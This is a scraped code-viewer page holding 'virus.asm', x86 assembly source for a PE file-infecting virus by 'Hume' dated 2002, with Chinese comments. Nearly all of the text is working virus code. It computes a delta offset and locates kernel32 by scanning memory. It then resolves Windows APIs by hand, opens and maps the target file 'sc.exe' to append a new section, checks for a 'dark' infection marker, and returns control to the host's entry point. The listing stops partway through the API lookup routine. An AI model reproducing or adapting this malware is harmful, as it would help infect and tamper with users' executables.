?? virus.asm
字號:
?
.586
.model flat, stdcall
option casemap :none ; case sensitive
include c:\hd\hd.h
include c:\hd\mac.h
;;--------------
GetApiA proto :DWORD,:DWORD
;;--------------
.CODE
VirusLen = vEnd-vBegin ;Virus 長度
vBegin:
;-----------------------------------------
include s_api.asm ;查找需要的api地址
;-----------------------------------------
desfile db "sc.exe",0
fsize dd ?
hfile dd ?
hMap dd ?
pMem dd ?
;-----------------------------------------
pe_Header dd ?
sec_align dd ?
file_align dd ?
newEip dd ?
oldEip dd ?
inc_size dd ?
oldEnd dd ?
;-----------------------------------------
sMessageBoxA db "MessageBoxA",0
aMessageBoxA dd 0
;;臨時變量...
sztit db "By Hume,2002",0
szMsg0 db "Hey,Hope U enjoy it!",0
CopyRight db "The SoftWare WAS OFFERRED by Hume[AfO]",0dh,0ah
db " Thx for using it!",0dh,0ah
db "Contact: Humewen@21cn.com",0dh,0ah
db " humeasm.yeah.net",0dh,0ah
db "The add Code SiZe:(heX)"
val dd 0,0,0,0
;;-----------------------------------------
__Start:
call _gd
_gd:
pop ebp ;得到delta地址
sub ebp,offset _gd
;因為在其他程序中基址可能不是默認的所以需要重定位
mov dword ptr [ebp+appBase],ebp ;呵呵仔細想想
mov eax,[esp] ;返回地址
xor edx,edx
getK32Base:
dec eax ;逐字節比較驗證
mov dx,word ptr [eax+IMAGE_DOS_HEADER.e_lfanew] ;就是ecx+3ch
test dx,0f000h ;Dos
Header+stub不可能太大,超過4096byte
jnz getK32Base ;加速檢驗
cmp eax,dword ptr
[eax+edx+IMAGE_NT_HEADERS.OptionalHeader.ImageBase]
jnz getK32Base ;看Image_Base值是否等于ecx即模塊起始值,
mov [ebp+k32Base],eax ;如果是,就認為找到kernel32的Base值
lea edi,[ebp+aGetModuleHandle]
lea esi,[ebp+lpApiAddrs]
lop_get:
lodsd
cmp eax,0
jz End_Get
add eax,ebp
push eax
push dword ptr [ebp+k32Base]
call GetApiA
stosd
jmp lop_get ;獲得api地址,參見s_api文件
End_Get:
call my_infect
include dislen.asm
;-----------------------------------------
CouldNotInfect:
__where:
xor eax,eax ;判斷是否是已經附加,標志'dark'
push eax
call [ebp+aGetModuleHandle]
mov esi,eax
add esi,[esi+3ch] ;->esi->程序本身的Pe_header
cmp dword ptr [esi+8],'dark'
je jmp_oep
jmp __xit ;退出啟動程序
jmp_oep:
add eax,[ebp+oldEip]
jmp eax ;跳到宿主程序的入口點
my_infect: ;感染部分,文件讀寫操作,Pe文件修改參見modipe.asm文件
xor eax,eax
push eax
push eax
push OPEN_EXISTING
push eax
push eax
push GENERIC_READ+GENERIC_WRITE
lea eax,[ebp+desfile]
push eax
call [ebp+aCreateFile] ;打開目標文件
inc eax
je __Err
dec eax
mov [ebp+hfile],eax
push eax
sub ebx,ebx
push ebx
push eax ;得到文件大小
call [ebp+aGetFileSize]
inc eax
je __sclosefile
dec eax
mov [ebp+fsize],eax
xchg eax,ecx
add ecx,1000h ;文件大小增加...4096
pop eax
xor ebx,ebx ;創建映射文件
push ebx
push ecx ;文件大小等于原大小+Vsize
push ebx
push PAGE_READWRITE
push ebx
push eax
call [ebp+aCreateFileMapping]
test eax,eax
je __sclosefile
mov [ebp+hMap],eax ;創建成功否?
xor ebx,ebx
push ebx
push ebx
push ebx
push FILE_MAP_WRITE
push eax
call [ebp+aMapViewOfFile]
test eax,eax
je __sclosemap ; 映射文件,是否成功?
mov [ebp+pMem],eax
;--------------------------------------------
; the following is modifying part,add new section
;--------------------------------------------
include modipe.asm
__sunview:
push [ebp+pMem]
call [ebp+aUnmapViewOfFile]
__sclosemap:
push [ebp+hMap]
call [ebp+aCloseHandle]
__sclosefile:
push [ebp+hfile]
call [ebp+aCloseHandle]
__Err::
ret
;-----------------------------------------
__xit:
push 0
call [ebp+aExitProcess]
vEnd:
;-----------------------------------------
END __Start
;;==============================================
;;s_api.asm
;;手動查找api部分
K32_api_retrieve proc Base:DWORD ,sApi:DWORD
push edx ;保存edx
xor eax,eax ;此時esi=sApi
Next_Api: ;edi=AddressOfNames
mov esi,sApi
xor edx,edx
dec edx
Match_Api_name:
movzx ebx,byte ptr [esi]
inc esi
cmp ebx,0
je foundit
inc edx
push eax
mov eax,[edi+eax*4] ;AddressOfNames的指針,遞增
add eax,Base ;注意是RVA,一定要加Base值
cmp bl,byte ptr [eax+edx] ;逐字符比較
pop eax
je Match_Api_name ;繼續搜尋
inc eax ;不匹配,下一個api
loop Next_Api
no_exist:
pop edx ;若全部搜完,即未存在
xor eax,eax
ret
foundit:
pop edx ;edx=AddressOfNameOrdinals
;*2得到AddressOfNameOrdinals的指針
movzx eax,word ptr [edx+eax*2] ;eax返回指向AddressOfFunctions的指針
ret
K32_api_retrieve endp
;-----------------------------------------
GetApiA proc Base:DWORD,sApi:DWORD
local ADDRofFun:DWORD
pushad
mov esi,Base
mov eax,esi
mov ebx,eax
mov ecx,eax
mov edx,eax
mov edi,eax ;all is Base!
add ecx,[ecx+3ch] ;現在esi=off PE_HEADER
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -